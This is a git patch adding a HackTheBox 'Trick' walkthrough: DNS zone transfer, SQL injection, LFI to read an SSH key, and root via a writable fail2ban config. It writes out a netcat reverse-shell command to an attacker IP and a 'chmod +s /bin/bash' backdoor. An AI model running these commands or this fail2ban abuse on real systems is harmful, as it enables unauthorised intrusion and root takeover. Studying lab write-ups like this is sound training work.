From abb5fb0b01908ff6c2e500104f210943814c81aa Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 10 Feb 2023 17:31:39 +0300
Subject: [PATCH] Create Trick.md
---
HackTheBox/Trick.md | 181 ++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 181 insertions(+)
create mode 100644 HackTheBox/Trick.md
diff --git a/HackTheBox/Trick.md b/HackTheBox/Trick.md
new file mode 100644
index 0000000..685d583
--- /dev/null
+++ b/HackTheBox/Trick.md
@@ -0,0 +1,181 @@
+# HackThBox - Trick
+
+## NMAP
+
+```bash
+Nmap scan report for 10.129.85.201
+Host is up (0.15s latency).
+Not shown: 65531 closed ports
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
+| ssh-hostkey:
+| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
+| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
+|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
+25/tcp open smtp?
+|_smtp-commands: Couldn't establish connection on port 25
+53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
+| dns-nsid:
+|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
+80/tcp open http nginx 1.14.2
+|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
+| http-methods:
+|_ Supported Methods: GET HEAD
+|_http-server-header: nginx/1.14.2
+|_http-title: Coming Soon - Start Bootstrap Theme
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+```
+
+## PORT 80 (HTTP)
+
+On the web page we see a bootstrap template which has nothing intersting
+
+
+
+Fuzzing for files and directories it didn't found anything as well
+
+
+
+## PORT 53 (DNS)
+
+Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name
+
+https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
+
+`dig -x 10.10.11.166 @10.10.11.166`
+
+
+
+Having the `trick.htb` we can add this in hosts file
+
+
+
+Now to enumerate further we can perform the dns zone transfer
+
+
+
+This shows `root.trick.htb` subdomain but it doesn't take us anywhere, on performing zone transfer with `axfr`
+
+
+
+We get another domain name `preprod-payroll.trick.htb`, so let's add this in hosts file as well
+
+
+
+Visting this subdomain, we'll get a login page on which we can try default credentials
+
+
+
+
+
+Which didn't worked, so next I tried sqli
+
+
+
+That worked, so I tried running `sqlmap` but `time-based blind` so it's gonna take a lot of time in dumping the data
+
+
+
+
+## Foothold
+
+Going back to the site we can see a GET parameter `page` fetching for pages, I tried to perform LFI on that parameter but it didn't worked
+
+I tried running `wfuzz` against the parameter using LFI wordlist
+
+
+
+
+
+Which didn't worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we'll get a GET parameter `id` which also is vulnerable to sqli
+
+
+
+
+
+
+
+It shows that it's boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file
+
+
+
+This shows another subdomain `preprod-marketing.trick.htb`
+
+
+
+Alternatively we can enumerate this subdomain by running wfuzz
+
+
+
+
+
+This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well
+
+
+
+
+
+This starts to give us some output on filterting the response
+
+
+
+We have the username `michael` , we can try to see if we can access his .ssh folder for `id_rsa`
+
+
+
+
+
+## Privilege Escalation
+
+Running `sudo -l` to check if we can run with sudo privileges
+
+
+
+So we can restart the `fail2ban` service but we don't know exaclty what we need to edit, being in security group we can check what permissions this group has
+
+
+
+We have write access to this folder which has configuration files for fail2ban
+
+
+
+I found an article explaining how we can abuse fail2ban config file
+
+https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
+
+For this we need to edit the `actionban` command in `iptables-multiport.conf`, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell
+
+```bash
+/usr/bin/nc 10.10.14.39 2222 -e /bin/bash
+```
+
+
+
+After editing the config file, move it back to the action.d folder and restart fail2ban service
+
+
+
+Then start doing fail attempts on login, you'll get a reverse shell on your port
+
+
+
+But our reverse shell connection dies and the reason behind this is, the ban duration lasts for 10 seconds and bans the host after the 5th attempt
+
+
+
+Instead of getting a reverse shell we can just make bash a SUID with `chmod +s /bin/bash`
+
+
+
+Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt
+
+
+
+
+
+
+## References
+
+- https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
+- https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7